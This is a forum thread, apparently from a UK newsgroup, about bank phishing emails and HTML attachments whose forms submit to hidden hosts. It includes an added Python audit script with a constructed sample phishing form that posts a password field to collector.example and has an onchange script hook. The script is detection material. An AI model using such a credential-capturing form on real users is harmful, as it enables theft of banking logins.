More ado with phishing..

It used to be something really stupid like olb2.nationet.com; it recently changed to

The really annoying thing about Nationwide is that trying to access the main website using Firefox and Linux it takes forever to load. Which is why I need to bookmark that obscure internet banking URL.

djc

Dave Liquorice :

Best to use a relatively secure browser such as Google Chrome for your sensitive stuff. And for nothing else.

Plain text e-mail neatly side-steps that problem.

Mike Barnes

That would be why they keep issuing fixes then?

dennis

Not if the HTML page is just an attached file. It points to your hard disk :-)

The Natural Philosopher

"dennis@home" :

"relatively"

Mike Barnes

I had the same run-in with Barclaycard "Secure" which has textbook vulnerabilities to a man-in-the-middle attack. The first time I saw it I mistook it for a browser hijack in a pop-up window (which basically it is). The forgeries of Barclaycard Secure are very good indeed but ask for more information than the real one - the entire password.

A lot of banks use some third party for their bulk customer emailing. This leaves you to guess whether they are genuine or not. And despite saying "we will never put links in our emails" they do :(

Paypal at least tries quite hard to do things more or less right with a specific salutation that is *always* used in genuine emails.

Funniest one I ran into was a major player with two parallel nearly identical sites with https: capability but only one of them intended to be exposed externally and properly Verisigned. Somehow Google had indexed both and I landed on the one which was mismatched to its security certificate. I was seriously unimpressed.

Worse than that they sometimes cold call me and demand that *I* prove to them who I am. My response is "tell me the first line of my address" (and they won't because of data protection); we deadlock at that point.

Martin Brown

The trouble with blacklisting is that smarthosts for major ISPs can and do end up on certain blacklists after a botnet or Trojan affects some of their users. The phishing and spam experts already have more than enough honeypots to catch generic spam quickly.

It can even be automated for ones that match certain rules. What I object to is filling in webpages.

Martin Brown

Even worse is when this is an automated system and you can't tell them that their security model is flawed.

Mark

But a decent ISP will get their machines off blacklists quickly and being a proper MTA will retry sending the queued messages or, if the recipient completely rejects(*) the message, bounce it back to the sender.

(*) Safer to say "temporary problem, call back later" rather than an out-and-out rejection; spammers rarely retry, proper MTAs do.

Dave Liquorice

If I load a file from the local disc with external links into my browser and hover over those links the browser tells me the content of the href. Don't these, recent, all singin', all dancin', enhanced web experience, browsers do that?

Dave Liquorice

A FORM statement is not a URL. It isn't a link. You can't 'hover over it'.

It's just where you go when you push that submit button.

Don't these, recent, all singin', all dancin', enhanced

Of course, but it makes no difference. All the LINKS are to the genuine bank pages.

The Natural Philosopher

Or what javascript gets triggered as you change values in the fields and is whisked away via XHR before you even think about pressing the button.

Andy Burns

There is no HREF underneath. You're clicking a button to submit a form. That doesn't show up in the status bar.

Tim Streater

So don't even half-complete the form and think that, by not clicking the submit button, you've not sent anything, because you may well have.

Tim Streater
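
Added example (not part of any post in this thread): a static check of a saved HTML attachment that reports what hovering over the links cannot show, namely where the form submits and whether script can run before submit is pressed. The sample markup and the hostnames bank.example and collector.example are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: an HTML "attachment" whose links all go to the real bank
# (bank.example) while the form submits elsewhere (collector.example).
SAMPLE = """<html><body>
<a href="https://www.bank.example/help">Help</a>
<a href="https://www.bank.example/security">Security</a>
<form method="post" action="http://collector.example/save.php">
<input name="memorable" onchange="send(this.value)">
<input type="submit" value="Log in">
</form>
<script>function send(v){var x=new XMLHttpRequest();}</script>
</body></html>"""

class AttachmentAudit(HTMLParser):
    """Collect where links point, where forms submit, and any script hooks."""
    def __init__(self):
        super().__init__()
        self.link_hosts, self.form_hosts, self.script_hooks = set(), set(), []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            self.link_hosts.add(urlparse(a["href"]).hostname)
        elif tag == "form":
            # An empty or relative action in a local file has no host (None)
            self.form_hosts.add(urlparse(a.get("action") or "").hostname)
        elif tag == "script":
            self.script_hooks.append("<script>")
        # on* attributes (onchange, onkeyup, ...) can fire before any submit
        self.script_hooks += [f"{tag}[{k}]" for k in a if k.startswith("on")]

def audit(html):
    p = AttachmentAudit()
    p.feed(html)
    p.close()
    findings = []
    for host in sorted(h or "(none/relative)" for h in p.form_hosts):
        if host not in p.link_hosts:
            findings.append(f"form submits to {host}, not a host used by the links")
    if p.script_hooks:
        findings.append("script can run before submit: " + ", ".join(p.script_hooks))
    return findings

if __name__ == "__main__":
    for line in audit(SAMPLE):
        print(line)
```
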

I should also have said that the browser's response is therefore:

"Sorry Dave, I can't do that."

Tim Streater

Ha lost the track of the thread, probably something to do with leaving for work at 0600 yesterday and not getting back 'till 2130 and getting up again at 0700 this morning.

B-)

I must watch that, ages since I did, got it on Bluray for Christmas.

Dave Liquorice

I saw no sign of that, I have to say.

The Natural Philosopher

Capital One have a similar problem with their automated phone system. I used to have a credit card with them when I lived in the UK. When I moved to France I gave them my French address but they don't permit me to have a card any more due to being non-resident in the UK. Fair enough. But every few months they send me a letter in the post about something or other such as changes to their terms and conditions. This has gone on for over six years now. I haven't had a Capital One card now for over six years but they still keep sending me mail as though I'm a card holder. I tried to phone them to ask them to stop but it is impossible because their phone system insists I enter my card number - which has long since expired and I forgot 6 years ago. It is impossible to speak to anyone without entering that number. So complete deadlock. They keep sending me mailings about my zero balance account (no account number specified in their mailings) and I keep destroying and binning them.

David in Normandy

Yes, I think there was none of that in the scripts recently received. But there's no reason it couldn't be like that.

Tim Streater

Striking letters through "NOT KNOWN AT THIS ADDRESS" works eventually.

Be *very* careful if you have ever registered for any of the bank branded card protection services linked to one of your cards if you move house. For reasons of "data protection" your change of address sent to the credit card and bank is not shared with the same named card security firm (which is actually a third party provider). The upshot of this is at renewal a complete list of all your credit cards is sent to the address where you previously lived. Then you have to get them to admit that it is a third party provider and which one to sort it out!

I have had it happen to me and had a similar package of stuff come to my new address and with a surprising name collision that suggested it might actually be identity fraud (i.e. addressed to another Mr Brown).

Martin Brown
